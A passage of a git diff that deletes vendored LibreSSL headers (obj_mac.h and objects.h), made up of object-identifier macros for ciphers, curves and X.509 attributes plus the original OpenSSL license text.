-#define OBJ_id_camellia128_wrap		1L,2L,392L,200011L,61L,1L,1L,3L,2L
-
-#define SN_id_camellia192_wrap		"id-camellia192-wrap"
-#define NID_id_camellia192_wrap		908
-#define OBJ_id_camellia192_wrap		1L,2L,392L,200011L,61L,1L,1L,3L,3L
-
-#define SN_id_camellia256_wrap		"id-camellia256-wrap"
-#define NID_id_camellia256_wrap		909
-#define OBJ_id_camellia256_wrap		1L,2L,392L,200011L,61L,1L,1L,3L,4L
-
-#define OBJ_ntt_ds		0L,3L,4401L,5L
-
-#define OBJ_camellia		OBJ_ntt_ds,3L,1L,9L
-
-#define SN_camellia_128_ecb		"CAMELLIA-128-ECB"
-#define LN_camellia_128_ecb		"camellia-128-ecb"
-#define NID_camellia_128_ecb		754
-#define OBJ_camellia_128_ecb		OBJ_camellia,1L
-
-#define SN_camellia_128_ofb128		"CAMELLIA-128-OFB"
-#define LN_camellia_128_ofb128		"camellia-128-ofb"
-#define NID_camellia_128_ofb128		766
-#define OBJ_camellia_128_ofb128		OBJ_camellia,3L
-
-#define SN_camellia_128_cfb128		"CAMELLIA-128-CFB"
-#define LN_camellia_128_cfb128		"camellia-128-cfb"
-#define NID_camellia_128_cfb128		757
-#define OBJ_camellia_128_cfb128		OBJ_camellia,4L
-
-#define SN_camellia_192_ecb		"CAMELLIA-192-ECB"
-#define LN_camellia_192_ecb		"camellia-192-ecb"
-#define NID_camellia_192_ecb		755
-#define OBJ_camellia_192_ecb		OBJ_camellia,21L
-
-#define SN_camellia_192_ofb128		"CAMELLIA-192-OFB"
-#define LN_camellia_192_ofb128		"camellia-192-ofb"
-#define NID_camellia_192_ofb128		767
-#define OBJ_camellia_192_ofb128		OBJ_camellia,23L
-
-#define SN_camellia_192_cfb128		"CAMELLIA-192-CFB"
-#define LN_camellia_192_cfb128		"camellia-192-cfb"
-#define NID_camellia_192_cfb128		758
-#define OBJ_camellia_192_cfb128		OBJ_camellia,24L
-
-#define SN_camellia_256_ecb		"CAMELLIA-256-ECB"
-#define LN_camellia_256_ecb		"camellia-256-ecb"
-#define NID_camellia_256_ecb		756
-#define OBJ_camellia_256_ecb		OBJ_camellia,41L
-
-#define SN_camellia_256_ofb128		"CAMELLIA-256-OFB"
-#define LN_camellia_256_ofb128		"camellia-256-ofb"
-#define NID_camellia_256_ofb128		768
-#define OBJ_camellia_256_ofb128		OBJ_camellia,43L
-
-#define SN_camellia_256_cfb128		"CAMELLIA-256-CFB"
-#define LN_camellia_256_cfb128		"camellia-256-cfb"
-#define NID_camellia_256_cfb128		759
-#define OBJ_camellia_256_cfb128		OBJ_camellia,44L
-
-#define SN_camellia_128_cfb1		"CAMELLIA-128-CFB1"
-#define LN_camellia_128_cfb1		"camellia-128-cfb1"
-#define NID_camellia_128_cfb1		760
-
-#define SN_camellia_192_cfb1		"CAMELLIA-192-CFB1"
-#define LN_camellia_192_cfb1		"camellia-192-cfb1"
-#define NID_camellia_192_cfb1		761
-
-#define SN_camellia_256_cfb1		"CAMELLIA-256-CFB1"
-#define LN_camellia_256_cfb1		"camellia-256-cfb1"
-#define NID_camellia_256_cfb1		762
-
-#define SN_camellia_128_cfb8		"CAMELLIA-128-CFB8"
-#define LN_camellia_128_cfb8		"camellia-128-cfb8"
-#define NID_camellia_128_cfb8		763
-
-#define SN_camellia_192_cfb8		"CAMELLIA-192-CFB8"
-#define LN_camellia_192_cfb8		"camellia-192-cfb8"
-#define NID_camellia_192_cfb8		764
-
-#define SN_camellia_256_cfb8		"CAMELLIA-256-CFB8"
-#define LN_camellia_256_cfb8		"camellia-256-cfb8"
-#define NID_camellia_256_cfb8		765
-
-#define SN_kisa		"KISA"
-#define LN_kisa		"kisa"
-#define NID_kisa		773
-#define OBJ_kisa		OBJ_member_body,410L,200004L
-
-#define SN_seed_ecb		"SEED-ECB"
-#define LN_seed_ecb		"seed-ecb"
-#define NID_seed_ecb		776
-#define OBJ_seed_ecb		OBJ_kisa,1L,3L
-
-#define SN_seed_cbc		"SEED-CBC"
-#define LN_seed_cbc		"seed-cbc"
-#define NID_seed_cbc		777
-#define OBJ_seed_cbc		OBJ_kisa,1L,4L
-
-#define SN_seed_cfb128		"SEED-CFB"
-#define LN_seed_cfb128		"seed-cfb"
-#define NID_seed_cfb128		779
-#define OBJ_seed_cfb128		OBJ_kisa,1L,5L
-
-#define SN_seed_ofb128		"SEED-OFB"
-#define LN_seed_ofb128		"seed-ofb"
-#define NID_seed_ofb128		778
-#define OBJ_seed_ofb128		OBJ_kisa,1L,6L
-
-#define SN_hmac		"HMAC"
-#define LN_hmac		"hmac"
-#define NID_hmac		855
-
-#define SN_cmac		"CMAC"
-#define LN_cmac		"cmac"
-#define NID_cmac		894
-
-#define SN_rc4_hmac_md5		"RC4-HMAC-MD5"
-#define LN_rc4_hmac_md5		"rc4-hmac-md5"
-#define NID_rc4_hmac_md5		915
-
-#define SN_aes_128_cbc_hmac_sha1		"AES-128-CBC-HMAC-SHA1"
-#define LN_aes_128_cbc_hmac_sha1		"aes-128-cbc-hmac-sha1"
-#define NID_aes_128_cbc_hmac_sha1		916
-
-#define SN_aes_192_cbc_hmac_sha1		"AES-192-CBC-HMAC-SHA1"
-#define LN_aes_192_cbc_hmac_sha1		"aes-192-cbc-hmac-sha1"
-#define NID_aes_192_cbc_hmac_sha1		917
-
-#define SN_aes_256_cbc_hmac_sha1		"AES-256-CBC-HMAC-SHA1"
-#define LN_aes_256_cbc_hmac_sha1		"aes-256-cbc-hmac-sha1"
-#define NID_aes_256_cbc_hmac_sha1		918
-
-#define SN_teletrust		"teletrust"
-#define NID_teletrust		920
-#define OBJ_teletrust		OBJ_identified_organization,36L
-
-#define SN_brainpool		"brainpool"
-#define NID_brainpool		921
-#define OBJ_brainpool		OBJ_teletrust,3L,3L,2L,8L,1L
-
-#define SN_brainpoolP160r1		"brainpoolP160r1"
-#define NID_brainpoolP160r1		922
-#define OBJ_brainpoolP160r1		OBJ_brainpool,1L,1L
-
-#define SN_brainpoolP160t1		"brainpoolP160t1"
-#define NID_brainpoolP160t1		923
-#define OBJ_brainpoolP160t1		OBJ_brainpool,1L,2L
-
-#define SN_brainpoolP192r1		"brainpoolP192r1"
-#define NID_brainpoolP192r1		924
-#define OBJ_brainpoolP192r1		OBJ_brainpool,1L,3L
-
-#define SN_brainpoolP192t1		"brainpoolP192t1"
-#define NID_brainpoolP192t1		925
-#define OBJ_brainpoolP192t1		OBJ_brainpool,1L,4L
-
-#define SN_brainpoolP224r1		"brainpoolP224r1"
-#define NID_brainpoolP224r1		926
-#define OBJ_brainpoolP224r1		OBJ_brainpool,1L,5L
-
-#define SN_brainpoolP224t1		"brainpoolP224t1"
-#define NID_brainpoolP224t1		927
-#define OBJ_brainpoolP224t1		OBJ_brainpool,1L,6L
-
-#define SN_brainpoolP256r1		"brainpoolP256r1"
-#define NID_brainpoolP256r1		928
-#define OBJ_brainpoolP256r1		OBJ_brainpool,1L,7L
-
-#define SN_brainpoolP256t1		"brainpoolP256t1"
-#define NID_brainpoolP256t1		929
-#define OBJ_brainpoolP256t1		OBJ_brainpool,1L,8L
-
-#define SN_brainpoolP320r1		"brainpoolP320r1"
-#define NID_brainpoolP320r1		930
-#define OBJ_brainpoolP320r1		OBJ_brainpool,1L,9L
-
-#define SN_brainpoolP320t1		"brainpoolP320t1"
-#define NID_brainpoolP320t1		931
-#define OBJ_brainpoolP320t1		OBJ_brainpool,1L,10L
-
-#define SN_brainpoolP384r1		"brainpoolP384r1"
-#define NID_brainpoolP384r1		932
-#define OBJ_brainpoolP384r1		OBJ_brainpool,1L,11L
-
-#define SN_brainpoolP384t1		"brainpoolP384t1"
-#define NID_brainpoolP384t1		933
-#define OBJ_brainpoolP384t1		OBJ_brainpool,1L,12L
-
-#define SN_brainpoolP512r1		"brainpoolP512r1"
-#define NID_brainpoolP512r1		934
-#define OBJ_brainpoolP512r1		OBJ_brainpool,1L,13L
-
-#define SN_brainpoolP512t1		"brainpoolP512t1"
-#define NID_brainpoolP512t1		935
-#define OBJ_brainpoolP512t1		OBJ_brainpool,1L,14L
-
-#define SN_FRP256v1		"FRP256v1"
-#define NID_FRP256v1		936
-#define OBJ_FRP256v1		1L,2L,250L,1L,223L,101L,256L,1L
-
-#define SN_chacha20		"ChaCha"
-#define LN_chacha20		"chacha"
-#define NID_chacha20		937
-
-#define SN_gost89_ecb		"gost89-ecb"
-#define NID_gost89_ecb		938
-
-#define SN_gost89_cbc		"gost89-cbc"
-#define NID_gost89_cbc		939
-
-#define SN_tc26		"tc26"
-#define NID_tc26		940
-#define OBJ_tc26		OBJ_member_body,643L,7L,1L
-
-#define SN_id_tc26_gost3411_2012_256		"streebog256"
-#define LN_id_tc26_gost3411_2012_256		"GOST R 34.11-2012 (256 bit)"
-#define NID_id_tc26_gost3411_2012_256		941
-#define OBJ_id_tc26_gost3411_2012_256		OBJ_tc26,1L,2L,2L
-
-#define SN_id_tc26_gost3411_2012_512		"streebog512"
-#define LN_id_tc26_gost3411_2012_512		"GOST R 34-11-2012 (512 bit)"
-#define NID_id_tc26_gost3411_2012_512		942
-#define OBJ_id_tc26_gost3411_2012_512		OBJ_tc26,1L,2L,3L
-
-#define SN_id_tc26_gost_3410_2012_512_paramSetA		"id-tc26-gost-3410-2012-512-paramSetA"
-#define NID_id_tc26_gost_3410_2012_512_paramSetA		943
-#define OBJ_id_tc26_gost_3410_2012_512_paramSetA		OBJ_tc26,2L,1L,2L,1L
-
-#define SN_id_tc26_gost_3410_2012_512_paramSetB		"id-tc26-gost-3410-2012-512-paramSetB"
-#define NID_id_tc26_gost_3410_2012_512_paramSetB		944
-#define OBJ_id_tc26_gost_3410_2012_512_paramSetB		OBJ_tc26,2L,1L,2L,2L
-
-#define SN_id_tc26_gost_28147_param_Z		"id-tc26-gost-28147-param-Z"
-#define NID_id_tc26_gost_28147_param_Z		945
-#define OBJ_id_tc26_gost_28147_param_Z		OBJ_tc26,2L,5L,1L,1L
-
-#define SN_id_tc26_gost3410_2012_256		"id-tc26-gost3410-2012-256"
-#define LN_id_tc26_gost3410_2012_256		"GOST R 34.10-2012 (256 bit)"
-#define NID_id_tc26_gost3410_2012_256		946
-#define OBJ_id_tc26_gost3410_2012_256		OBJ_tc26,1L,1L,1L
-
-#define SN_id_tc26_gost3410_2012_512		"id-tc26-gost3410-2012-512"
-#define LN_id_tc26_gost3410_2012_512		"GOST R 34.10-2012 (512 bit)"
-#define NID_id_tc26_gost3410_2012_512		947
-#define OBJ_id_tc26_gost3410_2012_512		OBJ_tc26,1L,1L,2L
-
-#define SN_id_tc26_signwithdigest_gost3410_2012_256		"id-tc26-signwithdigest-gost3410-2012-256"
-#define LN_id_tc26_signwithdigest_gost3410_2012_256		"GOST R 34.11-2012 with GOST R 34.10-2012 (256 bit)"
-#define NID_id_tc26_signwithdigest_gost3410_2012_256		948
-#define OBJ_id_tc26_signwithdigest_gost3410_2012_256		OBJ_tc26,1L,3L,2L
-
-#define SN_id_tc26_signwithdigest_gost3410_2012_512		"id-tc26-signwithdigest-gost3410-2012-512"
-#define LN_id_tc26_signwithdigest_gost3410_2012_512		"GOST R 34.11-2012 with GOST R 34.10-2012 (512 bit)"
-#define NID_id_tc26_signwithdigest_gost3410_2012_512		949
-#define OBJ_id_tc26_signwithdigest_gost3410_2012_512		OBJ_tc26,1L,3L,3L
-
-#define SN_X25519		"X25519"
-#define NID_X25519		950
-#define OBJ_X25519		1L,3L,101L,110L
-
-#define SN_X448		"X448"
-#define NID_X448		951
-#define OBJ_X448		1L,3L,101L,111L
-
-#define SN_Ed25519		"Ed25519"
-#define NID_Ed25519		952
-#define OBJ_Ed25519		1L,3L,101L,112L
-
-#define SN_Ed448		"Ed448"
-#define NID_Ed448		953
-#define OBJ_Ed448		1L,3L,101L,113L
-
-#define SN_Ed25519ph		"Ed25519ph"
-#define NID_Ed25519ph		954
-#define OBJ_Ed25519ph		1L,3L,101L,114L
-
-#define SN_Ed448ph		"Ed448ph"
-#define NID_Ed448ph		955
-#define OBJ_Ed448ph		1L,3L,101L,115L
-
diff --git a/thirdparty/libressl/include/openssl/objects.h b/thirdparty/libressl/include/openssl/objects.h
deleted file mode 100644
index c40991b..0000000
--- a/thirdparty/libressl/include/openssl/objects.h
+++ /dev/null
@@ -1,1140 +0,0 @@
-/* $OpenBSD: objects.h,v 1.12 2017/01/21 04:53:22 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_OBJECTS_H
-#define HEADER_OBJECTS_H
-
-#define USE_OBJ_MAC
-
-#ifdef USE_OBJ_MAC
-#include <openssl/obj_mac.h>
-#else
-#define SN_undef			"UNDEF"
-#define LN_undef			"undefined"
-#define NID_undef			0
-#define OBJ_undef			0L
-
-#define SN_Algorithm			"Algorithm"
-#define LN_algorithm			"algorithm"
-#define NID_algorithm			38
-#define OBJ_algorithm			1L,3L,14L,3L,2L
-
-#define LN_rsadsi			"rsadsi"
-#define NID_rsadsi			1
-#define OBJ_rsadsi			1L,2L,840L,113549L
-
-#define LN_pkcs				"pkcs"
-#define NID_pkcs			2
-#define OBJ_pkcs			OBJ_rsadsi,1L
-
-#define SN_md2				"MD2"
-#define LN_md2				"md2"
-#define NID_md2				3
-#define OBJ_md2				OBJ_rsadsi,2L,2L
-
-#define SN_md5				"MD5"
-#define LN_md5				"md5"
-#define NID_md5				4
-#define OBJ_md5				OBJ_rsadsi,2L,5L
-
-#define SN_rc4				"RC4"
-#define LN_rc4				"rc4"
-#define NID_rc4				5
-#define OBJ_rc4				OBJ_rsadsi,3L,4L
-
-#define LN_rsaEncryption		"rsaEncryption"
-#define NID_rsaEncryption		6
-#define OBJ_rsaEncryption		OBJ_pkcs,1L,1L
-
-#define SN_md2WithRSAEncryption		"RSA-MD2"
-#define LN_md2WithRSAEncryption		"md2WithRSAEncryption"
-#define NID_md2WithRSAEncryption	7
-#define OBJ_md2WithRSAEncryption	OBJ_pkcs,1L,2L
-
-#define SN_md5WithRSAEncryption		"RSA-MD5"
-#define LN_md5WithRSAEncryption		"md5WithRSAEncryption"
-#define NID_md5WithRSAEncryption	8
-#define OBJ_md5WithRSAEncryption	OBJ_pkcs,1L,4L
-
-#define SN_pbeWithMD2AndDES_CBC		"PBE-MD2-DES"
-#define LN_pbeWithMD2AndDES_CBC		"pbeWithMD2AndDES-CBC"
-#define NID_pbeWithMD2AndDES_CBC	9
-#define OBJ_pbeWithMD2AndDES_CBC	OBJ_pkcs,5L,1L
-
-#define SN_pbeWithMD5AndDES_CBC		"PBE-MD5-DES"
-#define LN_pbeWithMD5AndDES_CBC		"pbeWithMD5AndDES-CBC"
-#define NID_pbeWithMD5AndDES_CBC	10
-#define OBJ_pbeWithMD5AndDES_CBC	OBJ_pkcs,5L,3L
-
-#define LN_X500				"X500"
-#define NID_X500			11
-#define OBJ_X500			2L,5L
-
-#define LN_X509				"X509"
-#define NID_X509			12
-#define OBJ_X509			OBJ_X500,4L
-
-#define SN_commonName			"CN"
-#define LN_commonName			"commonName"
-#define NID_commonName			13
-#define OBJ_commonName			OBJ_X509,3L
-
-#define SN_countryName			"C"
-#define LN_countryName			"countryName"
-#define NID_countryName			14
-#define OBJ_countryName			OBJ_X509,6L
-
-#define SN_localityName			"L"
-#define LN_localityName			"localityName"
-#define NID_localityName		15
-#define OBJ_localityName		OBJ_X509,7L
-
-/* Postal Address? PA */
-
-/* should be "ST" (rfc1327) but MS uses 'S' */
-#define SN_stateOrProvinceName		"ST"
-#define LN_stateOrProvinceName		"stateOrProvinceName"
-#define NID_stateOrProvinceName		16
-#define OBJ_stateOrProvinceName		OBJ_X509,8L
-
-#define SN_organizationName		"O"
-#define LN_organizationName		"organizationName"
-#define NID_organizationName		17
-#define OBJ_organizationName		OBJ_X509,10L
-
-#define SN_organizationalUnitName	"OU"
-#define LN_organizationalUnitName	"organizationalUnitName"
-#define NID_organizationalUnitName	18
-#define OBJ_organizationalUnitName	OBJ_X509,11L
-
-#define SN_rsa				"RSA"
-#define LN_rsa				"rsa"
-#define NID_rsa				19
-#define OBJ_rsa				OBJ_X500,8L,1L,1L
-
-#define LN_pkcs7			"pkcs7"
-#define NID_pkcs7			20
-#define OBJ_pkcs7			OBJ_pkcs,7L
-
-#define LN_pkcs7_data			"pkcs7-data"
-#define NID_pkcs7_data			21
-#define OBJ_pkcs7_data			OBJ_pkcs7,1L
-
-#define LN_pkcs7_signed			"pkcs7-signedData"
-#define NID_pkcs7_signed		22
-#define OBJ_pkcs7_signed		OBJ_pkcs7,2L
-
-#define LN_pkcs7_enveloped		"pkcs7-envelopedData"
-#define NID_pkcs7_enveloped		23
-#define OBJ_pkcs7_enveloped		OBJ_pkcs7,3L
-
-#define LN_pkcs7_signedAndEnveloped	"pkcs7-signedAndEnvelopedData"
-#define NID_pkcs7_signedAndEnveloped	24
-#define OBJ_pkcs7_signedAndEnveloped	OBJ_pkcs7,4L
-
-#define LN_pkcs7_digest			"pkcs7-digestData"
-#define NID_pkcs7_digest		25
-#define OBJ_pkcs7_digest		OBJ_pkcs7,5L
-
-#define LN_pkcs7_encrypted		"pkcs7-encryptedData"
-#define NID_pkcs7_encrypted		26
-#define OBJ_pkcs7_encrypted		OBJ_pkcs7,6L
-
-#define LN_pkcs3			"pkcs3"
-#define NID_pkcs3			27
-#define OBJ_pkcs3			OBJ_pkcs,3L
-
-#define LN_dhKeyAgreement		"dhKeyAgreement"
-#define NID_dhKeyAgreement		28
-#define OBJ_dhKeyAgreement		OBJ_pkcs3,1L
-
-#define SN_des_ecb			"DES-ECB"
-#define LN_des_ecb			"des-ecb"
-#define NID_des_ecb			29
-#define OBJ_des_ecb			OBJ_algorithm,6L
-
-#define SN_des_cfb64			"DES-CFB"
-#define LN_des_cfb64			"des-cfb"
-#define NID_des_cfb64			30
-/* IV + num */
-#define OBJ_des_cfb64			OBJ_algorithm,9L
-
-#define SN_des_cbc			"DES-CBC"
-#define LN_des_cbc			"des-cbc"
-#define NID_des_cbc			31
-/* IV */
-#define OBJ_des_cbc			OBJ_algorithm,7L
-
-#define SN_des_ede			"DES-EDE"
-#define LN_des_ede			"des-ede"
-#define NID_des_ede			32
-/* ?? */
-#define OBJ_des_ede			OBJ_algorithm,17L
-
-#define SN_des_ede3			"DES-EDE3"
-#define LN_des_ede3			"des-ede3"
-#define NID_des_ede3			33
-
-#define SN_idea_cbc			"IDEA-CBC"
-#define LN_idea_cbc			"idea-cbc"
-#define NID_idea_cbc			34
-#define OBJ_idea_cbc			1L,3L,6L,1L,4L,1L,188L,7L,1L,1L,2L
-
-#define SN_idea_cfb64			"IDEA-CFB"
-#define LN_idea_cfb64			"idea-cfb"
-#define NID_idea_cfb64			35
-
-#define SN_idea_ecb			"IDEA-ECB"
-#define LN_idea_ecb			"idea-ecb"
-#define NID_idea_ecb			36
-
-#define SN_rc2_cbc			"RC2-CBC"
-#define LN_rc2_cbc			"rc2-cbc"
-#define NID_rc2_cbc			37
-#define OBJ_rc2_cbc			OBJ_rsadsi,3L,2L
-
-#define SN_rc2_ecb			"RC2-ECB"
-#define LN_rc2_ecb			"rc2-ecb"
-#define NID_rc2_ecb			38
-
-#define SN_rc2_cfb64			"RC2-CFB"
-#define LN_rc2_cfb64			"rc2-cfb"
-#define NID_rc2_cfb64			39
-
-#define SN_rc2_ofb64			"RC2-OFB"
-#define LN_rc2_ofb64			"rc2-ofb"
-#define NID_rc2_ofb64			40
-
-#define SN_sha				"SHA"
-#define LN_sha				"sha"
-#define NID_sha				41
-#define OBJ_sha				OBJ_algorithm,18L
-
-#define SN_shaWithRSAEncryption		"RSA-SHA"
-#define LN_shaWithRSAEncryption		"shaWithRSAEncryption"
-#define NID_shaWithRSAEncryption	42
-#define OBJ_shaWithRSAEncryption	OBJ_algorithm,15L
-
-#define SN_des_ede_cbc			"DES-EDE-CBC"
-#define LN_des_ede_cbc			"des-ede-cbc"
-#define NID_des_ede_cbc			43
-
-#define SN_des_ede3_cbc			"DES-EDE3-CBC"
-#define LN_des_ede3_cbc			"des-ede3-cbc"
-#define NID_des_ede3_cbc		44
-#define OBJ_des_ede3_cbc		OBJ_rsadsi,3L,7L
-
-#define SN_des_ofb64			"DES-OFB"
-#define LN_des_ofb64			"des-ofb"
-#define NID_des_ofb64			45
-#define OBJ_des_ofb64			OBJ_algorithm,8L
-
-#define SN_idea_ofb64			"IDEA-OFB"
-#define LN_idea_ofb64			"idea-ofb"
-#define NID_idea_ofb64			46
-
-#define LN_pkcs9			"pkcs9"
-#define NID_pkcs9			47
-#define OBJ_pkcs9			OBJ_pkcs,9L
-
-#define SN_pkcs9_emailAddress		"Email"
-#define LN_pkcs9_emailAddress		"emailAddress"
-#define NID_pkcs9_emailAddress		48
-#define OBJ_pkcs9_emailAddress		OBJ_pkcs9,1L
-
-#define LN_pkcs9_unstructuredName	"unstructuredName"
-#define NID_pkcs9_unstructuredName	49
-#define OBJ_pkcs9_unstructuredName	OBJ_pkcs9,2L
-
-#define LN_pkcs9_contentType		"contentType"
-#define NID_pkcs9_contentType		50
-#define OBJ_pkcs9_contentType		OBJ_pkcs9,3L
-
-#define LN_pkcs9_messageDigest		"messageDigest"
-#define NID_pkcs9_messageDigest		51
-#define OBJ_pkcs9_messageDigest		OBJ_pkcs9,4L
-
-#define LN_pkcs9_signingTime		"signingTime"
-#define NID_pkcs9_signingTime		52
-#define OBJ_pkcs9_signingTime		OBJ_pkcs9,5L
-
-#define LN_pkcs9_countersignature	"countersignature"
-#define NID_pkcs9_countersignature	53
-#define OBJ_pkcs9_countersignature	OBJ_pkcs9,6L
-
-#define LN_pkcs9_challengePassword	"challengePassword"
-#define NID_pkcs9_challengePassword	54
-#define OBJ_pkcs9_challengePassword	OBJ_pkcs9,7L
-
-#define LN_pkcs9_unstructuredAddress	"unstructuredAddress"
-#define NID_pkcs9_unstructuredAddress	55
-#define OBJ_pkcs9_unstructuredAddress	OBJ_pkcs9,8L
-
-#define LN_pkcs9_extCertAttributes	"extendedCertificateAttributes"
-#define NID_pkcs9_extCertAttributes	56
-#define OBJ_pkcs9_extCertAttributes	OBJ_pkcs9,9L
-
-#define SN_netscape			"Netscape"
-#define LN_netscape			"Netscape Communications Corp."
-#define NID_netscape			57
-#define OBJ_netscape			2L,16L,840L,1L,113730L
-
-#define SN_netscape_cert_extension	"nsCertExt"
-#define LN_netscape_cert_extension	"Netscape Certificate Extension"
-#define NID_netscape_cert_extension	58
-#define OBJ_netscape_cert_extension	OBJ_netscape,1L
-
-#define SN_netscape_data_type		"nsDataType"
-#define LN_netscape_data_type		"Netscape Data Type"
-#define NID_netscape_data_type		59
-#define OBJ_netscape_data_type		OBJ_netscape,2L
-
-#define SN_des_ede_cfb64		"DES-EDE-CFB"
-#define LN_des_ede_cfb64		"des-ede-cfb"
-#define NID_des_ede_cfb64		60
-
-#define SN_des_ede3_cfb64		"DES-EDE3-CFB"
-#define LN_des_ede3_cfb64		"des-ede3-cfb"
-#define NID_des_ede3_cfb64		61
-
-#define SN_des_ede_ofb64		"DES-EDE-OFB"
-#define LN_des_ede_ofb64		"des-ede-ofb"
-#define NID_des_ede_ofb64		62
-
-#define SN_des_ede3_ofb64		"DES-EDE3-OFB"
-#define LN_des_ede3_ofb64		"des-ede3-ofb"
-#define NID_des_ede3_ofb64		63
-
-/* I'm not sure about the object ID */
-#define SN_sha1				"SHA1"
-#define LN_sha1				"sha1"
-#define NID_sha1			64
-#define OBJ_sha1			OBJ_algorithm,26L
-/* 28 Jun 1996 - eay */
-/* #define OBJ_sha1			1L,3L,14L,2L,26L,05L <- wrong */
-
-#define SN_sha1WithRSAEncryption	"RSA-SHA1"
-#define LN_sha1WithRSAEncryption	"sha1WithRSAEncryption"
-#define NID_sha1WithRSAEncryption	65
-#define OBJ_sha1WithRSAEncryption	OBJ_pkcs,1L,5L
-
-#define SN_dsaWithSHA			"DSA-SHA"
-#define LN_dsaWithSHA			"dsaWithSHA"
-#define NID_dsaWithSHA			66
-#define OBJ_dsaWithSHA			OBJ_algorithm,13L
-
-#define SN_dsa_2			"DSA-old"
-#define LN_dsa_2			"dsaEncryption-old"
-#define NID_dsa_2			67
-#define OBJ_dsa_2			OBJ_algorithm,12L
-
-/* proposed by microsoft to RSA */
-#define SN_pbeWithSHA1AndRC2_CBC	"PBE-SHA1-RC2-64"
-#define LN_pbeWithSHA1AndRC2_CBC	"pbeWithSHA1AndRC2-CBC"
-#define NID_pbeWithSHA1AndRC2_CBC	68
-#define OBJ_pbeWithSHA1AndRC2_CBC	OBJ_pkcs,5L,11L
-
-/* proposed by microsoft to RSA as pbeWithSHA1AndRC4: it is now
- * defined explicitly in PKCS#5 v2.0 as id-PBKDF2 which is something
- * completely different.
- */
-#define LN_id_pbkdf2			"PBKDF2"
-#define NID_id_pbkdf2			69
-#define OBJ_id_pbkdf2			OBJ_pkcs,5L,12L
-
-#define SN_dsaWithSHA1_2		"DSA-SHA1-old"
-#define LN_dsaWithSHA1_2		"dsaWithSHA1-old"
-#define NID_dsaWithSHA1_2		70
-/* Got this one from 'sdn706r20.pdf' which is actually an NSA document :-) */
-#define OBJ_dsaWithSHA1_2		OBJ_algorithm,27L
-
-#define SN_netscape_cert_type		"nsCertType"
-#define LN_netscape_cert_type		"Netscape Cert Type"
-#define NID_netscape_cert_type		71
-#define OBJ_netscape_cert_type		OBJ_netscape_cert_extension,1L
-
-#define SN_netscape_base_url		"nsBaseUrl"
-#define LN_netscape_base_url		"Netscape Base Url"
-#define NID_netscape_base_url		72
-#define OBJ_netscape_base_url		OBJ_netscape_cert_extension,2L
-
-#define SN_netscape_revocation_url	"nsRevocationUrl"
-#define LN_netscape_revocation_url	"Netscape Revocation Url"
-#define NID_netscape_revocation_url	73
-#define OBJ_netscape_revocation_url	OBJ_netscape_cert_extension,3L
-
-#define SN_netscape_ca_revocation_url	"nsCaRevocationUrl"
-#define LN_netscape_ca_revocation_url	"Netscape CA Revocation Url"
-#define NID_netscape_ca_revocation_url	74
-#define OBJ_netscape_ca_revocation_url	OBJ_netscape_cert_extension,4L
-
-#define SN_netscape_renewal_url		"nsRenewalUrl"
-#define LN_netscape_renewal_url		"Netscape Renewal Url"
-#define NID_netscape_renewal_url	75
-#define OBJ_netscape_renewal_url	OBJ_netscape_cert_extension,7L
-
-#define SN_netscape_ca_policy_url	"nsCaPolicyUrl"
-#define LN_netscape_ca_policy_url	"Netscape CA Policy Url"
-#define NID_netscape_ca_policy_url	76
-#define OBJ_netscape_ca_policy_url	OBJ_netscape_cert_extension,8L
-
-#define SN_netscape_ssl_server_name	"nsSslServerName"
-#define LN_netscape_ssl_server_name	"Netscape SSL Server Name"
-#define NID_netscape_ssl_server_name	77
-#define OBJ_netscape_ssl_server_name	OBJ_netscape_cert_extension,12L
-
-#define SN_netscape_comment		"nsComment"
-#define LN_netscape_comment		"Netscape Comment"
-#define NID_netscape_comment		78
-#define OBJ_netscape_comment		OBJ_netscape_cert_extension,13L
-
-#define SN_netscape_cert_sequence	"nsCertSequence"
-#define LN_netscape_cert_sequence	"Netscape Certificate Sequence"
-#define NID_netscape_cert_sequence	79
